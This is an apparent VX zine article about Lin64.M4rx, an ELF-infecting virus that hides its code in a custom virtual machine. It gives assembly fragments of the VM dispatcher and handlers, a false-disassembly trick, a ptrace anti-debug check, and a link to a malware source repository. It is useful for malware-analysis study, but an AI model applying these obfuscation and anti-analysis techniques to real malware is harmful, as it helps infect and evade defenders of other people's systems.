                ___________                              __
                \__    ___/____ ______      ____  __ ___/  |_
                  |    | /     \\____ \    /  _ \|  |  \   __\
                  |    ||  Y Y  \  |_> >  (  <_> )  |  /|  |
                  |____||__|_|  /   __/ /\ \____/|____/ |__|
                              \/|__|    \/

|:::::::|  Lin64.M4rx: How to write a virtual machine in order to      |:::::::|
|:::::::|       hide your viruses and break your brain forever         |:::::::|

With love, by S01den.
mail: S01den@protonmail.com

.---\ Introduction /---.

In this new paper, I'm gonna present my latest virus: Lin64.M4rx, the first
virus I wrote that uses a VM as a protection against reverse engineering.
Obviously I didn't and I won't spread it in the wild. Don't do that stupid
thing either.

I implemented some tricks to spice up the RE a bit, such as false disassembly in
some parts of the code, and the classic PTRACE_TRACEME technique (but this time,
it won't be as easy as usual to bypass...).

Also, as usual, Lin64.M4rx is a virus infecting every ELF in the same directory
(PIE or not) with PT_NOTE to PT_LOAD injection; check sblip's paper in tmp0ut #1
for more details [0].

And as usual the payload is stupid as fuck (it just displays "BACA". Awesome.
I don't even know why I chose those letters).

Now that you're hyped, let's start digging into m4rx's source code.
Follow the white rabbit...

.---\ How to write a Virtual Machine in assembly /---.

First, I think I should explain what a VM is, to avoid any confusion.
When talking about binary obfuscation and reverse engineering, a VM is a kind
of binary protection in which the protected code is written with a (usually
custom) instruction set and executed by an emulated CPU.

When looking at disassembled virtualized code, you can see at first what the
VM is able to do, but not the order in which virtual opcodes are actually
executed.

Let's see how I created my own VM with its instruction set.
Before writing any line of code, I drew a diagram of how my Virtual Machine would
work:

           +---------- SPIDER ----------+
           | main code                  |            +-- H --+ <== HandlersTable
           |                            |            |___H1__|
           | f: I -> H                  |--- EXEC ---|___H2__|
      -----|    Ii -> Hi                |            |__...__|
      |    | SPIDER = f(VX)             |            |___Hn__|
      |    +----------------------------+
      |                                |         +-- VX --+
+----------------------------------+   |--CHECK--|___I1___|
| I = List of virtual instructions |             |___I2___|
+----------------------------------+             |__...___|


+--- Virtual Stack ---+      +---VirtualRegistersTable ---+
|_________S1__________|      |  R1  |  R2  |  ...  |  Rn  |
|_________..._________|      +----------------------------+
|_________Sn__________|         ^--- R1 = VPC (virtual program counter)

The virus itself is written with the custom instruction set I defined.
For the sake of simplicity, I chose to give the same size (8 bytes) to all
instructions.

Let's take an example.
%define MOV_Rx_Ry(x,y) db 0x04,x,y,0x2e,0xc3,0xec,0x92,0xf
This is the byte sequence encoding the instruction MOV_Rx_Ry(x,y), which is my
virtual equivalent of a "mov rX, rY", such as "mov rax, rbx" in x64.

The first byte, 0x04 here, is the number assigned to the instruction; it's what
the spider checks in order to jump to the right handler.

x and y are arguments; they are replaced by the numbers of the virtual registers
when the instruction is used. For example, MOV_Rx_Ry(1, 2) will move the value
stored in the second virtual register into the first virtual register.
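
To make the encoding concrete, here is a small Python model of it (not part of
the m4rx source, which is NASM). The opcode 0x04 and the five trailing bytes
come from the %define above; the helper names mov_rx_ry and decode are made up
for this sketch.

```python
# Toy model of the fixed-width (8-byte) virtual instruction encoding.
# mov_rx_ry() and decode() are hypothetical helper names for illustration.

INSTR_SIZE = 8
OP_MOV_RX_RY = 0x04                               # first byte: instruction number
FILLER = bytes([0x2E, 0xC3, 0xEC, 0x92, 0x0F])    # trailing bytes from the %define


def mov_rx_ry(x: int, y: int) -> bytes:
    """Encode MOV_Rx_Ry(x, y) as opcode, two register numbers, five filler bytes."""
    return bytes([OP_MOV_RX_RY, x, y]) + FILLER


def decode(instruction: bytes) -> tuple[int, int, int]:
    """Return (opcode, first argument, second argument) of one instruction."""
    if len(instruction) != INSTR_SIZE:
        raise ValueError("every virtual instruction is exactly 8 bytes long")
    return instruction[0], instruction[1], instruction[2]


encoded = mov_rx_ry(1, 2)
print(encoded.hex())      # 0401022ec3ec920f
print(decode(encoded))    # (4, 1, 2)
```

Every instruction built this way is exactly 8 bytes, so a decoder only ever
needs to look at bytes 0, 1 and 2.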

Here is a diagram showing how I organised the virtual registers
(each register is 8 bytes, a qword):

[VSP][r0][...][r(NBR_REG-1)][a0][a1][a2][a3][a4][a5][ret] --+
+----------------------------------------------+            |
| Virtual Context: 8+8*(NBR_REG)+8*6+8 bytes   | <----------+
|          Virtual Stack: 0x600 bytes          |
|         Real Stack: a lot of bytes           |
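
The size formula in the diagram can be checked with a few lines of Python. This
is only a sketch: NBR_REG = 8 is a hypothetical value (the paper doesn't give
it), and it assumes the slots are laid out exactly in the order drawn, with no
padding between them.

```python
# Toy model of the virtual context layout: [VSP][r0..r(NBR_REG-1)][a0..a5][ret].
# NBR_REG = 8 is an assumed value chosen for illustration only.

NBR_REG = 8      # hypothetical number of general-purpose virtual registers
SLOT_SIZE = 8    # each virtual register is a qword


def context_layout(nbr_reg: int) -> dict[str, int]:
    """Map each slot name to its byte offset from the start of the context."""
    names = (
        ["VSP"]
        + [f"r{i}" for i in range(nbr_reg)]
        + [f"a{i}" for i in range(6)]
        + ["ret"]
    )
    return {name: index * SLOT_SIZE for index, name in enumerate(names)}


layout = context_layout(NBR_REG)
context_size = len(layout) * SLOT_SIZE

# Same formula as in the diagram: 8 + 8*NBR_REG + 8*6 + 8
assert context_size == 8 + 8 * NBR_REG + 8 * 6 + 8

print(context_size)                  # 128 when NBR_REG = 8
print(layout["a0"], layout["ret"])   # 72 120 when NBR_REG = 8
```

Under these assumptions, slot number n sits at byte offset 8*n, which is the
same index-times-8 addressing the MOV handler uses on the context pointer.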

The last five bytes (0x2e,0xc3,0xec,0x92,0xf) are totally useless: the handler
never reads them, which is why I chose random bytes, to confuse reverse
engineers a little more.

Now, let's say that we have a MOV_Rx_Ry(A1_PARAM, VSP) somewhere in the virus
code. This instruction is designed to put the content of the VSP (equivalent of
RSP for the virtual stack) into A1, a syscall argument register.
How is the VM able to understand this custom instruction and execute it?

The answer is the spider. It's the name of the piece of code I wrote to link
the virtual instructions to their handlers (the blocks of real code
executing what virtual instructions are designed for).

Hopefully the code is not as frightening as an actual spider: it looks like a
big bug with 0x20 legs, but it's in fact a paper tiger[1]:

----------------------------------- cut-here -----------------------------------
; not the spider, but I think it's important to keep those registers in mind:
xor rax, rax ; rax will hold the program counter (pc)
xor rbx, rbx ; rbx will be a buffer register
xor rcx, rcx ; rcx will hold the first argument of an instruction
xor rdx, rdx ; rdx will hold the second argument of an instruction
xor rsi, rsi ; rsi will point to the virtual context (list of all virtual regs)
xor rdi, rdi ; rdi will point to the virus code

; now, the spider:
spider:
  mov rbx, qword [rdi+rax] ; rbx contains the current virtual opcode

  cmp bl, 0x1 ; NOP1
  je handlers_table.NOP
  cmp bl, 0x2 ; PUSHR
  je handlers_table.PUSH_Reg
  cmp bl, 0x3 ; POP_R
  je handlers_table.POP_Reg
  cmp bl, 0x4 ; MOV_Reg_to_Reg
  je handlers_table.MOV_Reg_to_Reg
  cmp bl, 0x20
  je handlers_table.JMPNEG

  .cmp_end:
    cmp rax, virus_end-code-5
    jl spider


Trivial, as you can see.
Now, the last piece of the puzzle: the handler.
The role of a handler is basically to operate on virtual registers or virtual
stack with real instructions, in order to perform what the virtual instruction
is supposed to do.
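
The spider/handler pair is the classic fetch, decode, dispatch loop. Here is a
toy Python model of it, under loud assumptions: a dict stands in for the cmp/je
chain, the virtual registers are a plain list, only NOP (0x1) and MOV_Rx_Ry
(0x4) are modelled, and the NOP padding bytes are invented.

```python
# Toy fetch/decode/dispatch loop over fixed-width virtual instructions.
# Illustrative only: the real spider is a cmp/je chain in assembly, not a dict.

INSTR_SIZE = 8
OP_NOP = 0x01
OP_MOV_RX_RY = 0x04


def handle_nop(regs: list[int], ins: bytes) -> None:
    """NOP: leave the virtual registers untouched."""


def handle_mov(regs: list[int], ins: bytes) -> None:
    """MOV_Rx_Ry: byte 1 is the destination register, byte 2 the source."""
    regs[ins[1]] = regs[ins[2]]


HANDLERS = {OP_NOP: handle_nop, OP_MOV_RX_RY: handle_mov}


def run(code: bytes, regs: list[int]) -> list[int]:
    """Execute every 8-byte instruction in order and return the registers."""
    pc = 0
    while pc + INSTR_SIZE <= len(code):
        ins = code[pc:pc + INSTR_SIZE]       # fetch
        handler = HANDLERS.get(ins[0])       # dispatch on the first byte
        if handler is None:
            raise ValueError(f"unknown virtual opcode {ins[0]:#x}")
        handler(regs, ins)                   # execute
        pc += INSTR_SIZE                     # pc += 8
    return regs


program = (
    bytes([OP_NOP, 0, 0, 0, 0, 0, 0, 0])                        # padding is made up
    + bytes([OP_MOV_RX_RY, 1, 2, 0x2E, 0xC3, 0xEC, 0x92, 0x0F])  # MOV_Rx_Ry(1, 2)
)
final_regs = run(program, [0, 10, 20, 30])
print(final_regs)   # [0, 20, 20, 30]
```

Because every instruction has the same width, advancing the program counter is
a constant add, and each handler only has to know which argument bytes it cares
about.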

Here is the handler corresponding to MOV_Rx_Ry(Rx, Ry):

----------------------------------- cut-here -----------------------------------
  ; first we clean the registers
  xor rcx, rcx
  xor rdx, rdx

  mov cl, byte [rdi+rax+1] ; rcx = Rx
  mov dl, byte [rdi+rax+2] ; rdx = Ry

  push rbx
  mov rbx, qword [rsi+rdx*8] ; move into rbx the value stored in Ry
  mov qword [rsi+rcx*8], rbx ; move rbx into Rx
  pop rbx

  add rax, 0x8 ; pc += 8 (easy because each instruction is made of 8 bytes)
  jmp spider.cmp_end ; return to spider

To perform a syscall, I wrote a special instruction, named SYSCALL(), which takes
the syscall number as its argument.
I created dedicated virtual registers, the argument registers, to hold the
syscall's arguments.

----------------------------------- cut-here -----------------------------------
  ; clear registers
  xor rcx, rcx
  xor rdx, rdx
  xor rbx, rbx

  mov bl, byte [rdi+rax+1] ; mov the syscall number in rbx

  ; save everything
  push rax
  push rdi
  push rsi
  push rdx
  push r10
  push r8
  push r9

  mov rdi, qword [rsi+A0] ; a0 = 1st syscall argument
  mov rdx, qword [rsi+A2] ; a2 = 3rd syscall argument
  mov r10, qword [rsi+A3] ; a3 = 4th syscall argument
  mov r8, qword [rsi+A4] ; a4 = 5th syscall argument
  mov r9, qword [rsi+A5] ; a5 = 6th syscall argument
  mov rsi, qword [rsi+A1] ; a1 = 2nd syscall argument

  ; a bit of false disassembly to hide the only syscall instruction in the whole
  ; source code
  jmp .jmp_over3+2
      db `\x80\x87`
  mov rax, rbx ; move the syscall number into rax to perform the syscall
  mov rbx, rsp

  ; restore everything
  mov rsp, rbx
  pop r9
  pop r8
  pop r10
  pop rdx
  pop rsi

  mov qword [rsi+RET_REG], rax ; mov the syscall return value into the return-reg
  pop rdi
  pop rax

  ; go to the next instruction
  add rax, 0x8 ; pc += 8
  jmp spider.cmp_end

.--\ The virtualized virus /--.

Now that we have a complete instruction set for our virtual CPU, we can actually
use the VM!
The code is pretty long, but not really complicated.
In fact, I took Lin64.Kropotkine[2] as a basis and I translated the code to my
own instruction set, so I won't explain the whole source code in detail.

I'm only going to explain the light anti-debug part, which is located at the
beginning of the virus.

----------------------------------- cut-here -----------------------------------

MOV_Rx_Ry(2,RET_REG_PARAM) ; put the return value into reg_2
JMP_NE(0,1,2,A0_PARAM)    ; if ptrace value is != 0, jump to MOV_B(A0_PARAM,123)
JMP_REL(0, 2) ; if ptrace == 0, there is no tracing so we can jump above the exit
MOV_B(A0_PARAM,123)  ; exit(123)

Once you've understood that, you can easily understand almost all of the code.

.--\ Conclusion /--.

I hope you enjoyed this paper! This project took me a lot of time, but it was
really fun to write.

Read the source code! It's not really complicated with the explanations I
provided in this paper (in addition to the sources of Lin64.Kropotkine[2]),
and I bet you'll learn a lot!

However, if you want to build it and test it, do it inside a VM! The virus is
a bit unstable and could harm your computer. I'm not responsible for that!
Test it at your own risk and don't spread it in the wild, I'm sure you're not
a skiddy.

This may be the first ELF virus using code virtualization; if that's not the
case, don't hesitate to contact me, I'm pretty curious about that.

Greetz to:
sblip, tmz, netspooky, yir/okb, shalltear, qkumba, smelly and all the people
who keep the vx scene alive.

See ya

.--\ Links and references /--.

[0] https://tmpout.sh/1/2.html
[1] https://en.wikipedia.org/wiki/Paper_tiger
[2] https://github.com/vxunderground/MalwareSourceCode/blob/main/VXUG/Linux.Kropotkine.asm